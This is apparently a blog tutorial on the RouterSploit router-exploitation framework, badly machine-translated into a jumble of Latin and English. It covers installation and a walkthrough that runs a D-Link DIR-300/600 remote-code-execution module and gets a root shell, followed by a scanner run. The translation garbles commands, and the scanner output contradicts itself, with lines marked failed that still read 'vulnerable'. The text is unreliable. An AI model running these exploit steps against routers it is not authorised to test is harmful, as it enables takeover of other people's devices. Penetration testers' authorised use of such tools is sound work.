RouterSploit mirabilis abusus compage specialiter embedded cogitationes.
Hoc instrumentum adhiberi potest a pentestro ad securitatem camerarum et iter itineris scan.
Contents
RouterSploit volutpat:
- Coded in Python.
- Imperium-linea interface.
- Docker firmamentum.
- Instrumenta modulari.
Supported OS:
- MacOS.
- Linux.
- Android Phone.
- Windows.
installing RouterSploit:
Requisita:
- futurum
- petitiones
- paramiko
- pysnmp
- pycrypto
Libitum:
- bluepy – bluetooth humilis industria
Installing in Kali Linux:
Sequi imperia infra:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Minimum Energy firmamentum Bluetooth:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Installing in Ubuntu:
Sequi imperia infra:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Minimum Energy firmamentum Bluetooth:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Installing in MacOS:
Sequi imperia infra:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Docker installing in:
Sequi imperia infra:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Quam ut Update RouterSploit??
Vos postulo ut saepe vitare incommodum RouterSploit update.
Novi moduli fere cotidie amet.
cd routersploit
git pull
Quomodo uti RouterSploit?
Consuetudinem
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`-. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Abusionem Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.3.0 Protocollum : https://www.threat9.com/ - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com/ Exploits: 128 Scanners: 4 Cres: 165 Generic: 4 Payloads: 32 Encoders: 6 rsf * >
Res gestae:
Ad faciendam Abusionem, modulus carpere iustus et pone in scopum:
rsf * > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Ad complementum usus tab clavem.
Ut ostenderet optiones, typeshow
:
rsf * (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
Nomen Current occasus Descriptio
---- ---------------- -----------
target target electronica e.g. http"://192.168.1.1
port 80 Scopum Portus
Ususrun
or *exploit
iubes uti scopum:
rsf * (D-LINK DIR-300 & DIR-600 RCE) > Curre
[+] Scopum est vulnerable
[*] Invocans mandatum ansa ...
cmd > whoami
root
Ad optiones:
rsf * (D-LINK DIR-300 & DIR-600 RCE) > set scopum http "://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Inhibere possibile est si scopus ad facinus particulare vulnerandum est:
rsf * (D-LINK DIR-300 & DIR-600 RCE) > reprehendo [+] Scopum est vulnerable
Curreshow info
ut ostenderet info de rebus.
Scanning for vulnerable Targets:
Scanners permittite cito cognoscere, si scopus vulnerabilis est ad quaslibet res gestas.
Iisdem imperiis ostendere / set bene, et currere.
rsf * (D-Link Scanner) > Curre [+] res gestae/dlink/dwr_932_info_disclosure est vulnerable [-] res / dlink / dir_300_320_615_auth_bypass non est vulnerable [-] res / dlink/dsl_2750b_info_disclosure est vulnerable [-] res / dlink / dns_320l_327l_rce non vulnerable [-] res / dlink / dir_645_password_disclosure est vulnerable [-] res / dlink / dir_300_600_615_info_disclosure est vulnerable [-] res / dlink / dir_300_600_rce non est vulnerable [+] Fabrica est vulnerable! - res gestae/dlink/dwr_932_info_disclosure
Etiam Read: 1337x procuratorem
Ultima verba:
RouterSploit mirabile instrumentum ad usus.
Si quis quaestiones de faciem tuam RouterSploit. Vide infra explanare. Manipulus noster CSHAWK tactus erit vobiscum asap.